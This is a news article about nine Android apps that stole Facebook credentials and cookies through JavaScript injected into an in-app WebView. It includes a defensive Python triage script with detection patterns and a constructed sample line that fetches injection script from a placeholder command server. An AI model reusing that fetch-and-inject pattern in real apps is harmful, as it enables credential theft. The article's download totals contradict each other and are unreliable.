Kyle Chua

Jul 7, 2021 (2 min read)

Beware of These 9 Android Apps That Are Stealing Facebook Login Credentials

Updated: Aug 21, 2021

Google has kicked nine popular Android apps with a combined 5.8 million downloads off of the Google Play Store after researchers found that they were stealing users’ Facebook login credentials.

Credit: Dr. Web

On the surface, nothing about the apps looks suspicious: each one provides a fully functioning service, ranging from photo editing and daily horoscopes to exercise guides and device performance optimisation. Cybersecurity firm Dr. Web, however, notes that this is precisely the point: the working features exist to win users' trust before the apps ask them to log in.

All of the malicious apps offered users the option to disable in-app ads by signing in to Facebook. Choosing that option opened the genuine Facebook sign-in page, but inside the app's own embedded web view rather than in the system browser. Once the page had loaded, the app fetched JavaScript from a command-and-control server and injected it into the page; the script captured the login and password as they were entered, handed them to the app, and the app forwarded them to the attackers. Because the page really is Facebook's, nothing on screen gives the theft away.

Credit: Dr. Web

The apps also stole the cookies of the freshly authenticated session. Cookies are small blocks of data a website stores in the browser to remember who is logged in, along with preferences and settings; a copied session cookie can let an attacker reuse the login without ever entering the password, so a stolen cookie is as dangerous as the credentials themselves until the session is ended.
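The pattern described above (a legitimate login page rendered inside an app's own web view, remotely supplied JavaScript injected into it, a bridge through which the script passes what it reads back to native code, and harvesting of the resulting session cookies) leaves recognisable traces in decompiled Android code. The triage script below is an added example, not code from this article, from Dr. Web, or from the trojans themselves: it runs a set of indicator patterns over strings such as grep output from a decompiled APK and reports whether the combination that makes the technique work is present. The indicator patterns, the verdict logic and both sample string sets are this example's own assumptions; `addJavascriptInterface`, `evaluateJavascript`, `loadUrl("javascript:...")` and `CookieManager.getCookie` are the standard Android WebView APIs that such a bridge, injection and cookie read would use, but the exact calls the trojans made are not stated on this page.

```python
import re
from dataclasses import dataclass, field

# Indicator patterns for the WebView credential-harvesting technique. These
# are this example's own assumptions for illustration, not signatures
# published by Dr. Web or Google.
INDICATORS = {
    # The real Facebook login page loaded into an app-controlled WebView.
    "loads_facebook_login": re.compile(
        r'loadUrl\s*\(\s*"https?://(?:m|www)\.facebook\.com/login', re.I),
    "js_enabled": re.compile(r"setJavaScriptEnabled\s*\(\s*true\s*\)"),
    # A native object exposed to page JavaScript: the path back to the app.
    "js_to_app_bridge": re.compile(r"addJavascriptInterface\s*\("),
    # The app pushing script into the loaded page.
    "js_injection": re.compile(
        r'evaluateJavascript\s*\(|loadUrl\s*\(\s*"javascript:'),
    # Reading the session cookies after login.
    "cookie_harvest": re.compile(
        r"CookieManager(?:\.getInstance\(\))?\.getCookie\s*\("),
}
URL_HOST = re.compile(r"https?://([\w.-]+)", re.I)


@dataclass
class Verdict:
    suspicious: bool
    reason: str
    hits: dict = field(default_factory=dict)         # indicator -> matching lines
    other_hosts: list = field(default_factory=list)  # non-Facebook hosts contacted


def triage(strings):
    """Score a list of code strings (e.g. grep output over decompiled Java/smali)."""
    hits = {name: [] for name in INDICATORS}
    hosts = set()
    for line in strings:
        for name, rx in INDICATORS.items():
            if rx.search(line):
                hits[name].append(line.strip())
        # Any non-Facebook host is a candidate source for the injected script.
        for host in URL_HOST.findall(line):
            if not host.lower().endswith("facebook.com"):
                hosts.add(host.lower())

    renders_login = bool(hits["loads_facebook_login"])
    can_inject = bool(hits["js_injection"])
    has_bridge = bool(hits["js_to_app_bridge"])

    # The genuine page only becomes a credential trap when the app can both
    # script it and receive what the script reads: injection plus a bridge.
    if renders_login and can_inject and has_bridge:
        return Verdict(True, "Facebook login loaded in WebView with script "
                             "injection and a JavaScript-to-app bridge",
                       hits, sorted(hosts))
    if renders_login and (can_inject or has_bridge):
        return Verdict(True, "Facebook login loaded in WebView with partial "
                             "injection/bridge capability; review manually",
                       hits, sorted(hosts))
    return Verdict(False, "no WebView login-harvesting pattern found",
                   hits, sorted(hosts))


# Constructed sample input (hypothetical, not strings from the real apps):
# what the harvesting pattern might look like in decompiled code.
TROJAN_LIKE = [
    'webView.getSettings().setJavaScriptEnabled(true);',
    'webView.addJavascriptInterface(new JsBridge(this), "Android");',
    'webView.loadUrl("https://www.facebook.com/login.php");',
    'String script = fetchText("https://example-c2.invalid/config/fb.js");',
    'webView.evaluateJavascript(script, null);',
    'String cookies = CookieManager.getInstance().getCookie("https://www.facebook.com");',
]

# Constructed benign counterpart: a help page in a WebView, and Facebook login
# handed to the system browser via Custom Tabs, which the app cannot script.
BENIGN_LIKE = [
    'webView.getSettings().setJavaScriptEnabled(true);',
    'webView.loadUrl("https://example.invalid/help/faq.html");',
    'new CustomTabsIntent.Builder().build().launchUrl(this, '
    'Uri.parse("https://www.facebook.com/login.php"));',
]

if __name__ == "__main__":
    for label, sample in (("trojan-like", TROJAN_LIKE), ("benign-like", BENIGN_LIKE)):
        v = triage(sample)
        print(f"{label}: suspicious={v.suspicious} ({v.reason}); "
              f"other hosts={v.other_hosts}")
```

The verdict deliberately keys on the combination rather than on any single API: `addJavascriptInterface` and `evaluateJavascript` are common in harmless apps, and a login URL alone proves nothing. The pattern only matches a login URL passed directly to `loadUrl`, so a URL assembled at runtime or loaded through a wrapper needs manual review, and the `other_hosts` list is a starting point for finding where the injected script came from, not proof that a host is a command server.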

“Analysis of the malicious programs showed that they all received settings for stealing logins and passwords of Facebook accounts,” the researchers wrote. “However, the attackers could have easily changed the trojans’ settings and commanded them to load the web page of another legitimate service. They could have even used a completely fake login form located on a phishing site. Thus, the trojans could have been used to steal logins and passwords from any service.”

Dr. Web identified five malware variants across the nine apps, but all of them are said to be the same trojan: they use identical file formats and the same JavaScript code to steal data.

Here’s a list of the 9 apps that have been removed:

  1. PIP Photo

  2. Processing Photo

  3. Rubbish Cleaner

  4. Inwell Fitness

  5. Horoscope Daily

  6. App Lock Keep

  7. Lockit Master

  8. Horoscope Pi

  9. App Lock Manager

Credit: Dr. Web

The most popular among them is PIP Photo, which had been downloaded more than 5.8 million times before being taken down. In second place is Processing Photo, with over 500,000 downloads. Rubbish Cleaner, Inwell Fitness and Horoscope Daily each have more than 100,000 downloads.

A Google spokesperson told Ars Technica that, on top of removing the apps, Google has also banned the developers from the marketplace, meaning they cannot submit new apps for approval in the future. That may not stop them entirely, though: a banned developer can pay the one-time registration fee and open a new developer account under a different name.

Credit: Mika Baumeister / Unsplash

If you have downloaded or interacted with any of the aforementioned apps, uninstall it, then check your device and your Facebook account for signs of compromise. Because the apps took session cookies as well as passwords, change your Facebook password and sign out of any sessions you do not recognise so that a stolen cookie stops working, and turn on two-factor authentication if you have not already. While you are at it, install anti-virus software from a trusted cybersecurity firm to help protect your device, if you haven't yet.

